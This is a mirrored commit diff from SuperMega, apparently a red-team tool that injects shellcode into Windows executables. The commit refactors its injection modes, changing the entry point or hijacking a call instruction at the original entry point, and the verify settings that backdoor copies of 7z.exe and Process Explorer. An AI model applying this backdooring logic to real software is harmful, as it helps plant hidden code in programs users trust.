mirror of
https://github.com/dobin/SuperMega
synced 2026-06-03 01:27:11 +00:00
refactor: cleanup 3
This commit is contained in:
Dobin
+1
-5
@@ -48,11 +48,7 @@ def inject():
|
|||||||
settings.exec_style = ExecStyle[exec_style]
|
settings.exec_style = ExecStyle[exec_style]
|
||||||
|
|
||||||
inject_style = request.form['inject_style']
|
inject_style = request.form['inject_style']
|
||||||
inject_style = InjectStyle[inject_style]
|
settings.inject_style = InjectStyle[inject_style]
|
||||||
if inject_style == InjectStyle.ENTRY:
|
|
||||||
settings.inject_mode = 1
|
|
||||||
elif inject_style == InjectStyle.HIJACK:
|
|
||||||
settings.inject_mode = 2
|
|
||||||
|
|
||||||
print(str(settings))
|
print(str(settings))
|
||||||
start(settings)
|
start(settings)
|
||||||
|
|||||||
@@ -13,21 +13,16 @@ import logging
|
|||||||
|
|
||||||
from helper import hexdump
|
from helper import hexdump
|
||||||
from derbackdoorer.mype import MyPe
|
from derbackdoorer.mype import MyPe
|
||||||
|
from model.defs import *
|
||||||
|
|
||||||
logger = logging.getLogger("DerBackdoorer")
|
logger = logging.getLogger("DerBackdoorer")
|
||||||
|
|
||||||
|
|
||||||
class PeBackdoor:
|
class PeBackdoor:
|
||||||
class SupportedRunModes(IntEnum):
|
def __init__(self, mype: MyPe, main_shc: bytes, inject_mode: InjectStyle):
|
||||||
ModifyOEP = 1
|
|
||||||
BackdoorEP = 2
|
|
||||||
HijackExport = 4
|
|
||||||
|
|
||||||
|
|
||||||
def __init__(self, mype: MyPe, main_shc, inject_mode):
|
|
||||||
self.mype: MyPe = mype
|
self.mype: MyPe = mype
|
||||||
self.runMode = inject_mode
|
self.runMode: InjectStyle = inject_mode
|
||||||
self.shellcodeData = main_shc
|
self.shellcodeData: bytes = main_shc
|
||||||
|
|
||||||
# Working
|
# Working
|
||||||
self.shellcodeOffset: int = 0 # from start of the file
|
self.shellcodeOffset: int = 0 # from start of the file
|
||||||
@@ -77,22 +72,22 @@ Trailing {sect_name} bytes:
|
|||||||
|
|
||||||
|
|
||||||
def setupShellcodeEntryPoint(self):
|
def setupShellcodeEntryPoint(self):
|
||||||
if self.runMode == int(PeBackdoor.SupportedRunModes.ModifyOEP):
|
if self.runMode == InjectStyle.ChangeEntryPoint:
|
||||||
rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset)
|
rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset)
|
||||||
self.mype.set_entrypoint(rva)
|
self.mype.set_entrypoint(rva)
|
||||||
|
|
||||||
logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}')
|
logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}')
|
||||||
return True
|
return True
|
||||||
|
|
||||||
elif self.runMode == int(PeBackdoor.SupportedRunModes.BackdoorEP):
|
elif self.runMode == InjectStyle.BackdoorCallInstr:
|
||||||
return self.backdoorEntryPoint()
|
return self.backdoorEntryPoint()
|
||||||
|
|
||||||
elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport):
|
#elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport):
|
||||||
addr = self.getExportEntryPoint()
|
# addr = self.getExportEntryPoint()
|
||||||
if addr == -1:
|
# if addr == -1:
|
||||||
logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!')
|
# logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!')
|
||||||
|
#
|
||||||
return self.backdoorEntryPoint(addr)
|
# return self.backdoorEntryPoint(addr)
|
||||||
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
@@ -250,7 +245,7 @@ Trailing {sect_name} bytes:
|
|||||||
self.compiledTrampoline = encoding
|
self.compiledTrampoline = encoding
|
||||||
self.compiledTrampolineCount = count
|
self.compiledTrampolineCount = count
|
||||||
|
|
||||||
logger.info('Successfully backdoored entry point with jump/call to shellcode.\n')
|
logger.info('Successfully backdoored entry point with jump/call to shellcode')
|
||||||
return instr.address
|
return instr.address
|
||||||
|
|
||||||
return 0
|
return 0
|
||||||
|
|||||||
@@ -56,13 +56,11 @@ class MyPe():
|
|||||||
|
|
||||||
def get_code_section_data(self) -> bytes:
|
def get_code_section_data(self) -> bytes:
|
||||||
sect = self.get_code_section()
|
sect = self.get_code_section()
|
||||||
print("CODE GET: {}".format(len(sect.get_data())))
|
|
||||||
return bytes(sect.get_data())
|
return bytes(sect.get_data())
|
||||||
|
|
||||||
|
|
||||||
def write_code_section_data(self, data: bytes):
|
def write_code_section_data(self, data: bytes):
|
||||||
sect = self.get_code_section()
|
sect = self.get_code_section()
|
||||||
print("CODE SET {} {}".format(len(data), sect.PointerToRawData))
|
|
||||||
self.pe.set_bytes_at_offset(sect.PointerToRawData, data)
|
self.pe.set_bytes_at_offset(sect.PointerToRawData, data)
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
+3
-2
@@ -27,9 +27,10 @@ class ExecStyle(Enum):
|
|||||||
class DataRefStyle(Enum):
|
class DataRefStyle(Enum):
|
||||||
APPEND = 1
|
APPEND = 1
|
||||||
|
|
||||||
|
|
||||||
class InjectStyle(Enum):
|
class InjectStyle(Enum):
|
||||||
ENTRY = "change AddressOfEntryPoint"
|
ChangeEntryPoint = "change AddressOfEntryPoint"
|
||||||
HIJACK = "hijack branching instruction at Original Entry Point (jmp, call, ...)"
|
BackdoorCallInstr = "hijack branching instruction at Original Entry Point (jmp, call, ...)"
|
||||||
|
|
||||||
class SourceStyle(Enum):
|
class SourceStyle(Enum):
|
||||||
peb_walk = "peb_walk"
|
peb_walk = "peb_walk"
|
||||||
|
|||||||
+1
-1
@@ -14,7 +14,7 @@ class Settings():
|
|||||||
self.short_call_patching: bool = False
|
self.short_call_patching: bool = False
|
||||||
|
|
||||||
# Injectable
|
# Injectable
|
||||||
self.inject_mode: int = 2
|
self.inject_mode: InjectStyle = InjectStyle.BackdoorCallInstr
|
||||||
self.inject_exe_in: FilePath = ""
|
self.inject_exe_in: FilePath = ""
|
||||||
self.inject_exe_out: FilePath = ""
|
self.inject_exe_out: FilePath = ""
|
||||||
|
|
||||||
|
|||||||
+3
-4
@@ -26,8 +26,8 @@ def inject_exe(
|
|||||||
shellcode_in = project.payload.payload_path
|
shellcode_in = project.payload.payload_path
|
||||||
exe_in = settings.inject_exe_in
|
exe_in = settings.inject_exe_in
|
||||||
exe_out = settings.inject_exe_out
|
exe_out = settings.inject_exe_out
|
||||||
inject_mode = settings.inject_mode
|
inject_mode: InjectStyle = settings.inject_mode
|
||||||
source_style = settings.source_style
|
source_style: SourceStyle = settings.source_style
|
||||||
|
|
||||||
logger.info("--[ Injecting: {} into: {} -> {} (mode: {})".format(
|
logger.info("--[ Injecting: {} into: {} -> {} (mode: {})".format(
|
||||||
shellcode_in, exe_in, exe_out, inject_mode
|
shellcode_in, exe_in, exe_out, inject_mode
|
||||||
@@ -92,7 +92,7 @@ def injected_fix_iat(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
|
|||||||
offset_from_code = code.index(iatRequest.placeholder)
|
offset_from_code = code.index(iatRequest.placeholder)
|
||||||
instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr
|
instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr
|
||||||
logger.info(" Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format(
|
logger.info(" Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format(
|
||||||
iatRequest.placeholder, instruction_virtual_address, destination_virtual_address
|
iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address
|
||||||
))
|
))
|
||||||
jmp = assemble_and_disassemble_jump(
|
jmp = assemble_and_disassemble_jump(
|
||||||
instruction_virtual_address, destination_virtual_address
|
instruction_virtual_address, destination_virtual_address
|
||||||
@@ -124,7 +124,6 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
|
|||||||
# patch code section
|
# patch code section
|
||||||
# replace the placeholder with a LEA instruction to the data we written above
|
# replace the placeholder with a LEA instruction to the data we written above
|
||||||
code = mype.get_code_section_data()
|
code = mype.get_code_section_data()
|
||||||
print("Type of code: ", type(code))
|
|
||||||
for datareuse_fixup in reusedata_fixups:
|
for datareuse_fixup in reusedata_fixups:
|
||||||
if not datareuse_fixup.randbytes in code:
|
if not datareuse_fixup.randbytes in code:
|
||||||
raise Exception("DataResuse: ID {} not found, abort".format(
|
raise Exception("DataResuse: ID {} not found, abort".format(
|
||||||
|
|||||||
+6
-3
@@ -1,9 +1,12 @@
|
|||||||
import re
|
import re
|
||||||
import os
|
import os
|
||||||
|
import logging
|
||||||
|
|
||||||
|
logger = logging.getLogger("masmshc")
|
||||||
|
|
||||||
VERSION = "0.3"
|
|
||||||
g_is32bit = False
|
g_is32bit = False
|
||||||
|
|
||||||
|
|
||||||
class Params:
|
class Params:
|
||||||
def __init__(self, infile, outfile, inline_strings, remove_crt, append_rsp_stub):
|
def __init__(self, infile, outfile, inline_strings, remove_crt, append_rsp_stub):
|
||||||
self.infile = infile
|
self.infile = infile
|
||||||
@@ -116,10 +119,10 @@ def process_file(params):
|
|||||||
# ofile.write("\tjmp\tmain\n")
|
# ofile.write("\tjmp\tmain\n")
|
||||||
elif params.append_rsp_stub:
|
elif params.append_rsp_stub:
|
||||||
append_align_rsp(ofile)
|
append_align_rsp(ofile)
|
||||||
print("[INFO] Entry Point: AlignRSP")
|
logger.debug("[INFO] Entry Point: AlignRSP")
|
||||||
|
|
||||||
if seg_name == "_BSS":
|
if seg_name == "_BSS":
|
||||||
print(f"[ERROR] Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!\n")
|
logger.error(f"[ERROR] Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!\n")
|
||||||
|
|
||||||
if seg_name in ("pdata", "xdata", "voltbl"):
|
if seg_name in ("pdata", "xdata", "voltbl"):
|
||||||
in_skipped = True
|
in_skipped = True
|
||||||
|
|||||||
+9
-7
@@ -58,17 +58,17 @@ def main():
|
|||||||
|
|
||||||
if args.verify == "peb":
|
if args.verify == "peb":
|
||||||
settings.source_style = SourceStyle.peb_walk
|
settings.source_style = SourceStyle.peb_walk
|
||||||
settings.inject_mode = 2
|
settings.inject_mode = InjectStyle.BackdoorCallInstr
|
||||||
settings.inject_exe_in = "exes/7z.exe"
|
settings.inject_exe_in = "exes/7z.exe"
|
||||||
settings.inject_exe_out = "out/7z-verify.exe"
|
settings.inject_exe_out = "out/7z-verify.exe"
|
||||||
elif args.verify == "iat":
|
elif args.verify == "iat":
|
||||||
settings.source_style = SourceStyle.iat_reuse
|
settings.source_style = SourceStyle.iat_reuse
|
||||||
settings.inject_mode = 2
|
settings.inject_mode = InjectStyle.BackdoorCallInstr
|
||||||
settings.inject_exe_in = "exes/procexp64.exe"
|
settings.inject_exe_in = "exes/procexp64.exe"
|
||||||
settings.inject_exe_out = "out/procexp64-verify.exe"
|
settings.inject_exe_out = "out/procexp64-verify.exe"
|
||||||
elif args.verify == "rwx":
|
elif args.verify == "rwx":
|
||||||
settings.source_style = SourceStyle.peb_walk
|
settings.source_style = SourceStyle.peb_walk
|
||||||
settings.inject_mode = 1 # ,2 is broken atm
|
settings.inject_mode = InjectStyle.ChangeEntryPoint # ,2 is broken atm
|
||||||
settings.inject_exe_in = "exes/wifiinfoview.exe"
|
settings.inject_exe_in = "exes/wifiinfoview.exe"
|
||||||
settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
|
settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
|
||||||
else:
|
else:
|
||||||
@@ -101,12 +101,14 @@ def main():
|
|||||||
if args.exec == "direct_1":
|
if args.exec == "direct_1":
|
||||||
settings.exec_style = ExecStyle.CALL
|
settings.exec_style = ExecStyle.CALL
|
||||||
|
|
||||||
if args.rbrunmode:
|
if args.inject:
|
||||||
if args.rbrunmode == "1" or args.rbrunmode == "2":
|
if args.rbrunmode == "eop":
|
||||||
settings.inject_mode = int(args.rbrunmode)
|
settings.inject_mode = InjectStyle.ChangeEntryPoint
|
||||||
|
elif args.rbrunmode == "backdoor":
|
||||||
|
settings.inject_mode = InjectStyle.BackdoorCallInstr
|
||||||
else:
|
else:
|
||||||
logging.error("Invalid mode, use one of:")
|
logging.error("Invalid mode, use one of:")
|
||||||
for i in ["1", "2"]:
|
for i in ["eop", "backdoor"]:
|
||||||
logging.error(" {} {}".format(i, rbrunmode_str(i)))
|
logging.error(" {} {}".format(i, rbrunmode_str(i)))
|
||||||
return
|
return
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user